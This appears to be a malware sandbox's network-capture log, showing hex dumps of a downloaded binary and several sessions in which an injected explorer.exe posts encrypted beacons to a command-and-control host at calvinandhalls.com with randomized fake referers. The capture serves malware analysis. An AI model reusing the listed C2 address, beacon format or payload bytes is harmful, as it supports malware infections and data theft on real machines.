                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01 0f a3 04 24 73 ee 8b c1 83 c4 20 5e c9 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 0c 8b 4c 24 04 85 d2 74 69 33 c0 8a 44 24 08 84 c0 75 16 81 fa 80 00 00 00 72 0e 83 3d 08 ea 44 00 00 74 05 e9 5b 19 00 00 57 8b f9 83 fa 04 72 31 f7 d9 83 e1 03 74 0c 2b d1 88 07 83 c7 01 83 e9 01 75 f6 8b c8 c1 e0 08 03 c1 8b c8 c1 e0 10 03 c1 8b ca 83 e2 03 c1 e9 02 74 06 f3 ab 85 d2 74 0a 88 07 83 c7 01 83 ea 01 75 f6 8b 44 24 08 5f c3 8b 44 24 04 c3 8b ff 55 8b ec 51 51 a1 00 e5 43 00 33 c5 89 45 fc 53 33 db 56 57 89 5d f8 39 5d 1c 75 0b 8b 45 08 8b 00 8b 40 04 89 45 1c 8b 35 50 e1 40 00 33 c0 39 5d 20 53 53 ff 75 14 0f 95 c0 ff 75 10 8d 04 c5 01 00 00 00 50 ff 75 1c ff d6 8b f8 3b fb 75 04 33 c0 eb 7f 7e 3c 81 ff f0 ff ff 7f
                                                                                          Data Ascii: It$s ^T$L$ti3D$ur=Dt[Wr1t+uttuD$_D$UQQC3ES3VW]9]uE@E5P@39] SSuuPu;u3~<
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: 2a a1 ff ff 6a 22 eb c8 8b 7d 08 8b 07 89 45 f4 8b 47 04 8b c8 c1 e9 14 ba ff 07 00 00 53 23 ca 33 db 3b ca 0f 85 92 00 00 00 85 db 0f 85 8a 00 00 00 8b 45 10 83 f8 ff 75 04 0b c0 eb 03 83 c0 fe 6a 00 ff 75 14 8d 5e 02 50 53 57 e8 24 ff ff ff 83 c4 14 85 c0 74 19 80 7d e8 00 c6 06 00 0f 84 a1 02 00 00 8b 4d e4 83 61 70 fd e9 95 02 00 00 80 3b 2d 75 04 c6 06 2d 46 83 7d 18 00 c6 06 30 0f 94 c0 fe c8 24 e0 04 78 88 46 01 6a 65 83 c6 02 56 e8 3f 09 00 00 59 59 85 c0 0f 84 55 02 00 00 83 7d 18 00 0f 94 c1 fe c9 80 e1 e0 80 c1 70 88 08 c6 40 03 00 e9 3b 02 00 00 25 00 00 00 80 33 c9 0b c8 74 04 c6 06 2d 46 8b 5d 18 85 db 0f 94 c0 fe c8 24 e0 04 78 f7 db 1b db c6 06 30 88 46 01 8b 4f 04 83 e3 e0 81 e1 00 00 f0 7f 33 c0 83 c3 27 33 d2 0b c1 75 24 c6 46 02 30 8b
                                                                                          Data Ascii: *j"}EGS#3;Euju^PSW$t}Map;-u-F}0$xFjeV?YYU}p@;%3t-F]$x0FO3'3u$F0
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: 74 03 ff 45 b0 8b 45 dc 8b 7d d8 8b 55 d8 d1 6d dc c1 e0 1f d1 ef 0b f8 8b 45 d4 c1 e2 1f d1 e8 0b c2 4e 89 7d d8 89 45 d4 75 d1 39 75 b0 74 05 66 83 4d d4 01 b8 00 80 00 00 66 39 45 d4 77 11 8b 55 d4 81 e2 ff ff 01 00 81 fa 00 80 01 00 75 34 83 7d d6 ff 75 2b 83 65 d6 00 83 7d da ff 75 1c 83 65 da 00 ba ff ff 00 00 66 39 55 de 75 07 66 89 45 de 41 eb 0e 66 ff 45 de eb 08 ff 45 da eb 03 ff 45 d6 b8 ff 7f 00 00 66 3b c8 72 23 33 c0 33 c9 66 39 45 90 89 45 c8 0f 94 c1 89 45 c4 49 81 e1 00 00 00 80 81 c1 00 80 ff 7f 89 4d cc eb 3b 66 8b 45 d6 0b 4d 90 66 89 45 c4 8b 45 d8 89 45 c6 8b 45 dc 89 45 ca 66 89 4d ce eb 1e 33 c0 66 85 f6 0f 94 c0 83 65 c8 00 48 25 00 00 00 80 05 00 80 ff 7f 83 65 c4 00 89 45 cc 83 7d ac 00 0f 85 3d fd ff ff 8b 45 cc 0f b7 4d c4 8b
                                                                                          Data Ascii: tEE}UmEN}Eu9utfMf9EwUu4}u+e}uef9UufEAfEEEf;r#33f9EEEIM;fEMfEEEEEfM3feH%eE}=EM
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 ff 00 00 00 00 00 00 e0 7f 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 7f 00 00 80 ff 00 00 c0 7f 00 00 c0 ff 00 00 00 00 00 00 00 80 ca f2 49 71 ca f2 49 f1 60 42 a2 0d 60 42 a2 8d 59 f3 f8 c2 1f 6e a5 01 59 f3 f8 c2 1f 6e a5 81 74 61 6e 00 63 6f 73 00
                                                                                          Data Ascii: QRSTUVWXYZ{|}~ IqI`B`BYnYntancos
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          2024-10-03 21:28:02 UTC8000INData Raw: e8 43 95 63 bb a0 63 14 15 39 2b 94 6b 3d 83 2e 6d 3d 4c 57 37 50 0f 3f 97 d6 81 83 3b 83 ec 0e 35 f0 b2 b2 7d f4 f1 70 de 73 5b e1 ff 0f 3b c2 b4 36 e2 8d 50 42 7e 5d 57 46 56 05 9d 8a 26 13 2a 69 50 87 8e da 3a 68 55 b5 fa 53 f9 52 eb 88 6e 3b b9 be 99 b2 1b 44 5d 44 98 48 3f 26 5b 8f 4d 92 a3 5f 8e bd 74 33 97 6d 1e 69 88 ec f4 c3 2d 51 c6 68 e0 24 5d c4 44 62 7a b5 54 ce 1e fe ea 31 c2 c8 65 a1 f2 b5 6c ab e9 61 9b ce 8e 5a 9d 74 be 6f eb c5 ee 82 ee f4 e7 cc ce 8e f3 e3 38 aa 69 64 1c 0c 78 1e 7f 63 64 47 34 24 1f 29 b2 8a d5 53 bf 7c 82 76 e5 c4 c0 b7 85 88 84 b0 4f 0b db 20 32 98 62 3a ec 89 07 21 1e 6e 71 0d 0c 45 16 99 2c b1 32 d7 48 b6 cd 94 f1 0a 16 37 90 6e fb 88 2a d8 65 7b 7f 89 79 49 ed 13 0f 37 c0 63 90 ce 29 6b b8 6a fd 4d 55 cd f9 30 1b
                                                                                          Data Ascii: Ccc9+k=.m=LW7P?;5}ps[;6PB~]WFV&*iP:hUSRn;D]DH?&[M_t3mi-Qh$]DbzT1elaZto8idxcdG4$)S|vO 2b:!nqE,2H7n*e{yI7c)kjMU0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.55000423.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:27 UTC286OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://ilsdlpkysrci.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 171
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:27 UTC171OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 3c d3 6b 83 a4 a6 30 32 cd 1e 70 f6 4f f8 80 00 22 ea 26 4b 58 d1 cb f9 4b d5 be 10 64 da f3 5d 82 44 3a e6 e6 0d 29 4e 11 57 51 f4 21 d3 d2 aa 1e f1 e2 4d 34 37 e1 4d 50 be 5e 56 d8 fd 80 9d 0a 0a d1 77 df 32 b5 38 36 bb 3f 8d 73 7d 6e 77 40 db bb 00 a1 8e 0c 9e 45 10 e6 ce e4
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLj4%<<k02pO"&KXKd]D:)NWQ!M47MP^Vw286?s}nw@E
                                                                                          2024-10-03 21:28:27 UTC294INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:28:27 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Transfer-Encoding: chunked
                                                                                          2024-10-03 21:28:27 UTC7898INData Raw: 31 65 65 37 0d 0a 19 00 00 00 1e 0d ae 58 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                                          Data Ascii: 1ee7X[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                                          2024-10-03 21:28:27 UTC19INData Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c c7
                                                                                          Data Ascii: JMQF 82
                                                                                          2024-10-03 21:28:27 UTC2INData Raw: 0d 0a
                                                                                          Data Ascii:
                                                                                          2024-10-03 21:28:27 UTC8192INData Raw: 32 30 30 30 0d 0a 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f 19
                                                                                          Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                                          2024-10-03 21:28:27 UTC6INData Raw: 20 09 6c 1a f8 c5
                                                                                          Data Ascii: l
                                                                                          2024-10-03 21:28:27 UTC2INData Raw: 0d 0a
                                                                                          Data Ascii:
                                                                                          2024-10-03 21:28:27 UTC8192INData Raw: 32 30 30 30 0d 0a 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5 ab
                                                                                          Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                                          2024-10-03 21:28:27 UTC6INData Raw: 4f 16 27 c7 be ec
                                                                                          Data Ascii: O'
                                                                                          2024-10-03 21:28:27 UTC2INData Raw: 0d 0a
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.55000523.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:28 UTC289OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://bebgtshlvflmuxm.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 182
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:28 UTC182OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 4a de 63 ee 93 df 5c 58 ba 74 6c 9c 2b d7 fe 18 0a b1 6f 16 55 dc fa 8f 2c c3 a0 76 4c d3 f7 71 9b 28 49 af f5 7d 29 62 00 01 2c 9f 08 cf ee b5 57 cc ac 33 00 39 93 74 21 a5 51 7e d8 fd fb 9d 06 0f 84 7c a0 20 9f 34 72 c7 34 a3 61 28 46 6e 16 ec ba 58 af 9a 09 dd 33 6c c2 d7 ad 1e c7 9d 1a 97 88 85 b3 39 70 e5
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lj4%<Jc\Xtl+oU,vLq(I})b,W39t!Q~| 4r4a(FnX3l9p
                                                                                          2024-10-03 21:28:29 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:28 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.55000623.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:29 UTC285OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://ujkayjvdqul.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 250
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:29 UTC250OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 55 ab 27 8b bc b8 35 49 c3 12 63 b0 2e c8 f0 38 6e be 68 5a 31 bc c8 97 58 ff b2 04 02 8e b1 31 e1 24 33 e7 c0 4e 0b 25 01 21 0b d3 35 c7 d6 9d 3a d1 a5 22 62 4a b1 69 36 b0 34 1a c0 83 a0 9e 00 2d b5 75 cc 3f 8a 1a 49 99 3f 80 36 68 57 3c 4a ab e4 0c 99 93 78 c2 3e 27 d8 d7 a8 5b e6 e4 17 81 bd a5 a2 2f 24 c0 a8 a0 0d 16 81 0a 0c d7 34 6e 2e b2 57 2a 57 f3 43 32 4a de 93 da 19 30 dc f1 72 f3 3c 8b c7 a5 08 77 07 29 ba 5a 6e 17 35 27 f6 31 f0 d6 7c 42 03 4e 53 dc e9 23 4f 4c 55 b5 9d 9b 19 da a2 0c e0 53 9e d2
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lk4%<U'5Ic.8nhZ1X1$3N%!5:"bJi64-u?I?6hW<Jx>'[/$4n.W*WC2J0r<w)Zn5'1|BNS#OLUS
                                                                                          2024-10-03 21:28:29 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:29 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.55000723.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:30 UTC288OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://eycfcgwvugnqxe.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 215
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:30 UTC215OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 5c f2 7f bc 9a a3 37 40 c4 2c 3b f7 42 c7 c3 2d 65 cf 15 2d 52 df ff e4 78 ce f1 6d 01 f5 e3 7a f6 70 59 b2 85 0a 1f 32 46 09 47 98 08 90 e7 91 59 d6 b3 6f 17 10 a0 0e 06 ad 72 57 e3 9b 93 91 40 0f 92 70 ed 7a ec 73 3f 9b 1e b4 32 31 7e 70 54 c9 ad 75 9a dc 12 ef 31 1c 9d bd c8 03 d8 ed 56 8f 92 ad b9 4c 41 8c d7 d5 0a 4e dd 66 39 89 66 4f 11 fc 72 73 57 d1 2b 02 18 93 b5 c0 28 3e 9a a6 65 88 4a fa ea fd 5f
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lh4%<\7@,;B-e-RxmzpY2FGYorW@pzs?21~pTu1VLANf9fOrsW+(>eJ_
                                                                                          2024-10-03 21:28:30 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:30 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.55000823.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:31 UTC290OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://uggcvdvmydqspblb.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 183
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:31 UTC183OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 7f ed 18 8f c5 b2 20 3b b5 2d 31 90 3f 9e ec 2b 02 fa 67 44 54 92 b7 ef 25 e0 db 03 6e ea a4 22 a2 5b 3a 98 ea 49 65 70 4b 20 40 d3 16 89 e4 b2 13 85 a8 5f 39 0d e4 18 59 b0 4f 52 90 99 f6 dc 4d 73 c2 73 c8 46 eb 67 72 cc 18 8d 3f 78 3b 04 59 ee b6 1e af b9 7b 95 43 62 ea cd d9 1f e5 80 61 ae 99 b4 be 5a 70 ce e0
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Li4%< ;-1?+gDT%n"[:IepK @_9YORMssFgr?x;Y{CbaZp
                                                                                          2024-10-03 21:28:31 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:31 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.55000923.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:32 UTC286OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://ipavwsqiqelj.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 358
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:32 UTC358OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 67 ba 63 88 a5 d0 4e 14 b0 2f 1d 86 67 8f da 05 0d d2 12 2e 50 c3 d4 d5 59 f9 dc 4f 7f 8a e0 7b eb 7b 7e 89 d8 60 6c 54 5e 38 17 81 60 ac 88 c0 13 f1 82 65 6f 56 e8 19 55 c6 76 00 e9 e0 f4 ca 43 0f dc 75 e4 4b 9b 60 43 83 27 c1 62 48 26 78 14 dc da 05 87 bc 7c 8d 45 06 88 de d8 24 fd 9e 6f b5 90 e0 d7 36 3c c3 d2 c6 17 2f b8 1c 16 91 69 7a 4e bf 32 19 60 fb 23 18 39 c2 a0 ff 68 4b d1 ea 14 b8 27 e2 f3 a7 0b 3e 15 30 d5 57 3e 41 35 19 ce 2b fc ac 7e 58 10 54 43 d0 a1 25 59 49 16 bb 8a e5 36 e2 f4 3b 98 4f d6 a1 f0 87 58 b9 22
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Ln4%<gcN/g.PYO{{~`lT^8`eoVUvCuK`C'bH&x|E$o6</izN2`#9hK'>0W>A5+~XTC%YI6;OX"
                                                                                          2024-10-03 21:28:32 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:32 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.55001023.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:33 UTC286OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://bullivvhvmuc.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 258
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:33 UTC258OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 29 bd 60 94 9b c4 58 52 e9 2b 31 ef 33 fb c1 00 3e c4 0a 2d 71 c3 d5 fc 52 fc bf 7b 6c f1 a7 2e b6 6c 71 e5 e3 10 12 3f 71 4d 45 fa 10 c4 8e ce 27 d4 a9 7f 07 04 bc 7e 2a b5 4f 40 c4 9d 9d c5 0f 0d 90 1f a7 68 e6 79 57 d3 42 ca 71 4e 30 2e 7f f1 e7 10 95 b2 1a 98 2f 3b 84 e1 c7 12 cd eb 10 b6 d3 ff 94 2a 5f 8d d4 cf 7e 4c 99 72 33 ea 7f 4b 46 9a 4c 08 57 cd 3a 71 1a 80 dd ec 28 43 bf a4 66 a7 7d 93 c5 a7 77 33 7e 37 ae 4e 77 67 46 26 f4 58 84 aa 07 4c 10 54 5b e2 93 63 65 05 17 ad 8d dd 55 97 bc 34 eb 32 d5 82 c3 bc 7f b8 21
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lo4%<)`XR+13>-qR{l.lq?qME'~*O@hyWBqN0./;*_~Lr3KFLW:q(Cf}w3~7NwgF&XLT[ceU42!
